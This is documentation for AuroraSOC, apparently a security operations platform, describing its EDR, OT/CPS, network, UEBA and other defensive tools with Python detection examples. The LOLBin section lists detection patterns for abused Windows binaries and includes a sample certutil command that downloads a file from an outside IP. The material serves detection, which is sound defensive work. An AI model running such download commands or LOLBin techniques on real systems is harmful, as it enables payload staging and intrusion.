CPS, Network, EDR & Specialized Tools
Beyond SIEM and SOAR, AuroraSOC provides 22 additional tools across six domains. This page covers all remaining tool modules.
EDR Tools (2 tools)
Located in aurorasoc/tools/edr/:
IsolateEndpoint
```python
class IsolateEndpoint(AuroraTool):
    name = "isolate_endpoint"
    description = "Network-isolate a compromised host via EDR platform"
    # Parameters: hostname, isolation_type (full/selective), reason
    # Returns: isolation status, management channel info
```
ScanEndpoint
```python
class ScanEndpoint(AuroraTool):
    name = "scan_endpoint"
    description = "Execute on-demand security scan via EDR"
    # Parameters: hostname, scan_type (quick/full/ioc), targets
    # Returns: findings, risk_score, recommendations
```
CPS Tools (6 tools)
Located in aurorasoc/tools/cps/. The largest tool module, reflecting the complexity of CPS security.
QueryCPSSensor
Reads real-time telemetry from CPS devices via the MQTT bridge:
- Temperature, vibration, voltage readings
- Network activity counters
- Device health status
- Last communication timestamp
VerifyAttestation
Triggers firmware attestation for a specific device:
- Sends attestation challenge to device via MQTT command topic
- Device computes firmware hash and ECDSA signature
- Rust core engine verifies signature
- Returns attestation result (VERIFIED/FAILED)
RevokeCertificate
Revokes a compromised device's TLS certificate:
- Contacts the internal CA or Vault PKI backend
- Adds certificate to CRL (Certificate Revocation List)
- Device will fail TLS handshake on next connection
- Irreversible — always requires human approval
CorrelatePhysicalCyber
Analyzes events for physical-cyber correlations:
- Takes physical event (sensor data) and cyber event (alert)
- Checks temporal proximity (configurable window)
- Evaluates location/zone correlation
- Returns correlation type and confidence
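The window and zone checks described above, as an added illustration that is not AuroraSOC's own implementation. The events, the linear temporal decay, the 0.6/0.4 weighting and the correlation type names are all assumptions made for this example.

```python
from datetime import datetime

# Constructed sample events (not real telemetry); timestamps are ISO 8601 UTC.
PHYSICAL_EVENT = {"ts": "2024-05-01T10:00:05Z", "zone": "pumphouse-2",
                  "device": "plc-07", "metric": "vibration", "value": 9.8}
CYBER_EVENT = {"ts": "2024-05-01T10:00:00Z", "zone": "pumphouse-2",
               "host": "hmi-03", "rule": "modbus_write_unexpected"}


def _parse(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def correlate(physical: dict, cyber: dict, window_s: int = 60) -> dict:
    """Return a correlation type and confidence for one physical/cyber pair.

    Hypothetical scoring that mirrors the tool's two checks: temporal
    proximity inside a configurable window, then location/zone agreement.
    """
    delta = abs((_parse(physical["ts"]) - _parse(cyber["ts"])).total_seconds())
    if delta > window_s:
        return {"type": "NONE", "confidence": 0.0, "delta_s": delta}
    # Closer in time -> higher temporal score (linear decay across the window).
    temporal = 1.0 - delta / window_s
    same_zone = physical["zone"] == cyber["zone"]
    confidence = round(0.6 * temporal + (0.4 if same_zone else 0.0), 2)
    # A cyber event that precedes the physical effect is the cause->effect
    # ordering an analyst wants surfaced; the reverse may be noise or coincidence.
    cyber_first = _parse(cyber["ts"]) <= _parse(physical["ts"])
    if same_zone and cyber_first:
        ctype = "CYBER_TO_PHYSICAL"
    elif same_zone:
        ctype = "PHYSICAL_TO_CYBER"
    else:
        ctype = "TEMPORAL_ONLY"
    return {"type": ctype, "confidence": confidence, "delta_s": delta}


if __name__ == "__main__":
    print(correlate(PHYSICAL_EVENT, CYBER_EVENT))
```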
QueryOTProtocol
Queries industrial protocol data:
- Modbus register reads
- DNP3 data point queries
- BACnet property reads
- OPC UA node browsing
IsolateNetworkSegment
Isolates an OT network segment at the firewall/switch:
- Blocks all traffic to/from a specified VLAN or subnet
- Preserves safety-critical communication (configurable whitelist)
- Requires human approval — could disrupt physical processes
Network Tools (3 tools)
Located in aurorasoc/tools/network/:
| Tool | Purpose |
|---|---|
| AnalyzeFlows | Analyze network flow data (NetFlow/IPFIX) for anomalies |
| DetectDNSTunneling | Detect DNS tunneling via entropy and query pattern analysis |
| BlockIP | Block a malicious IP at the network perimeter |
DNS Tunneling Detection
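The entropy and query-pattern analysis the DetectDNSTunneling tool is described as using, shown as an added example rather than the tool's own code. The sample queries, the thresholds (entropy 3.5 bits, label length 20, three unique labels) and the two-label registered-domain heuristic are assumptions.

```python
import math
from collections import defaultdict

# Constructed sample (qname, client) pairs; the long labels imitate encoded data.
QUERIES = [
    ("www.example.com", "10.0.0.5"),
    ("mail.example.com", "10.0.0.5"),
    ("3q8z1k9f2m7x0v4b6n1p5r8t2y.bad-cdn.net", "10.0.0.9"),
    ("9h2k4m6n8p1q3r5s7t9v1w3x5y.bad-cdn.net", "10.0.0.9"),
    ("a1b2c3d4e5f6g7h8i9j0k1l2m3.bad-cdn.net", "10.0.0.9"),
    ("z9y8x7w6v5u4t3s2r1q0p9o8n7.bad-cdn.net", "10.0.0.9"),
]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random-looking labels score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registered domain (no suffix list).
    return ".".join(qname.split(".")[-2:])


def detect_tunneling(queries, entropy_threshold=3.5, min_unique=3, label_len=20):
    """Flag (domain, client) pairs whose first subdomain labels look like data.

    Combines the two signals the tool description names: per-label entropy
    and the query pattern (many unique long labels under one registered
    domain from a single client). Thresholds are hypothetical.
    """
    seen = defaultdict(set)
    for qname, client in queries:
        domain = registered_domain(qname)
        sub = qname[: -len(domain) - 1] if qname.endswith("." + domain) else ""
        label = sub.split(".")[0] if sub else ""
        if len(label) >= label_len and shannon_entropy(label) >= entropy_threshold:
            seen[(domain, client)].add(label)
    return {k: len(v) for k, v in seen.items() if len(v) >= min_unique}
```

Ordinary hostnames such as www or mail never reach the entropy check because they fail the length gate first, so a single misleading long label is not enough; the client must repeat the pattern.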
Threat Intel Tools (3 tools)
Located in aurorasoc/tools/threat_intel/:
| Tool | Purpose |
|---|---|
| LookupIOC | Search local DB and external feeds for an IOC |
| EnrichIOC | Add context and store in vector DB |
| ShareIOC | Publish IOC to NATS for cross-site sharing |
Forensics Tools (2 tools)
Located in aurorasoc/tools/forensics/:
| Tool | Purpose |
|---|---|
| CollectEvidence | Gather forensic artifacts from an endpoint |
| TimelineReconstruction | Build chronological event timeline |
Malware Tools (2 tools)
Located in aurorasoc/tools/malware/:
| Tool | Purpose |
|---|---|
| RunYARAScan | Execute YARA rules against files or memory |
| SandboxAnalysis | Submit files to sandbox for behavioral analysis |
UEBA Tools (3 tools)
Located in aurorasoc/tools/ueba/:
| Tool | Purpose |
|---|---|
| HuntLOLBins | Detect Living-Off-the-Land binary usage |
| BaselineDeviation | Detect deviations from user/entity behavioral baselines |
| UserRiskScore | Calculate composite risk score for a user |
LOLBin Detection
```python
class HuntLOLBins(AuroraTool):
    """Detect Living-Off-the-Land binaries used for malicious purposes."""

    LOLBIN_PATTERNS = [
        {"binary": "certutil.exe", "suspicious_args": ["-urlcache", "-decode"]},
        {"binary": "mshta.exe", "suspicious_args": ["http://", "javascript:"]},
        {"binary": "regsvr32.exe", "suspicious_args": ["/s", "/u", "http://"]},
        {"binary": "rundll32.exe", "suspicious_args": ["javascript:", "shell32"]},
        {"binary": "bitsadmin.exe", "suspicious_args": ["/transfer"]},
        # ... 20+ more patterns
    ]
```
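How the pattern table above can be applied to process-creation events, as an added example (not the HuntLOLBins implementation). The events are constructed, the pattern list is the subset shown on this page, and the matching rule (image basename plus at least one suspicious argument) is an assumption.

```python
# Constructed process-creation events (image path + command line), not real logs.
PROCESS_EVENTS = [
    {"host": "ws-101", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/a.txt a.txt"},
    {"host": "ws-101", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -dump cert.cer"},
    {"host": "ws-102", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "ws-103", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Subset of the page's LOLBIN_PATTERNS; the full list lives in HuntLOLBins.
LOLBIN_PATTERNS = [
    {"binary": "certutil.exe", "suspicious_args": ["-urlcache", "-decode"]},
    {"binary": "mshta.exe", "suspicious_args": ["http://", "javascript:"]},
    {"binary": "regsvr32.exe", "suspicious_args": ["/s", "/u", "http://"]},
    {"binary": "rundll32.exe", "suspicious_args": ["javascript:", "shell32"]},
    {"binary": "bitsadmin.exe", "suspicious_args": ["/transfer"]},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt_lolbins(events, patterns=LOLBIN_PATTERNS):
    """Return one finding per event whose binary AND an argument pattern match.

    Requiring a suspicious argument, not just the binary, keeps routine
    administrative use (e.g. certutil -dump) out of the result set.
    """
    by_binary = {p["binary"]: p["suspicious_args"] for p in patterns}
    findings = []
    for ev in events:
        args = by_binary.get(basename(ev["image"]))
        if not args:
            continue
        cmd = ev["cmdline"].lower()
        hits = [a for a in args if a.lower() in cmd]
        if hits:
            findings.append({"host": ev["host"], "binary": basename(ev["image"]),
                             "matched_args": hits})
    return findings
```

Substring matching on short tokens such as "/s" or "/u" will over-match (for example "/silent"), so in production the argument patterns should be tokenised or expressed as anchored regexes.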
MCP Registry (1 tool)
Located in aurorasoc/tools/registry/:
The MCP (Model Context Protocol) registry server exposes all 31 tools as a single MCP-compatible endpoint. AI agents connect to this registry to discover available tools.
Complete Tool Reference
| # | Tool | Module | Domain |
|---|---|---|---|
| 1 | SearchLogs | siem | Log search |
| 2 | CorrelateEvents | siem | Event correlation |
| 3 | ExtractIOC | siem | IOC extraction |
| 4 | MitreMap | siem | MITRE mapping |
| 5 | ExecutePlaybook | soar | Playbook execution |
| 6 | RequestHumanApproval | soar | Human gate |
| 7 | CreateCase | soar | Case creation |
| 8 | UpdateCase | soar | Case update |
| 9 | GenerateReport | soar | Report generation |
| 10 | IsolateEndpoint | edr | Host isolation |
| 11 | ScanEndpoint | edr | Endpoint scan |
| 12 | QueryCPSSensor | cps | Sensor telemetry |
| 13 | VerifyAttestation | cps | Firmware integrity |
| 14 | RevokeCertificate | cps | Certificate revocation |
| 15 | CorrelatePhysicalCyber | cps | Cross-domain correlation |
| 16 | QueryOTProtocol | cps | Industrial protocol |
| 17 | IsolateNetworkSegment | cps | OT isolation |
| 18 | LookupIOC | threat_intel | IOC lookup |
| 19 | EnrichIOC | threat_intel | IOC enrichment |
| 20 | ShareIOC | threat_intel | IOC sharing |
| 21 | AnalyzeFlows | network | Flow analysis |
| 22 | DetectDNSTunneling | network | DNS telemetry |
| 23 | BlockIP | network | IP blocking |
| 24 | CollectEvidence | forensics | Evidence collection |
| 25 | TimelineReconstruction | forensics | Timeline building |
| 26 | RunYARAScan | malware | YARA scanning |
| 27 | SandboxAnalysis | malware | Sandbox execution |
| 28 | HuntLOLBins | ueba | LOLBin detection |
| 29 | BaselineDeviation | ueba | Behavior analysis |
| 30 | UserRiskScore | ueba | User risk |
| 31 | MCP Registry | registry | Tool discovery |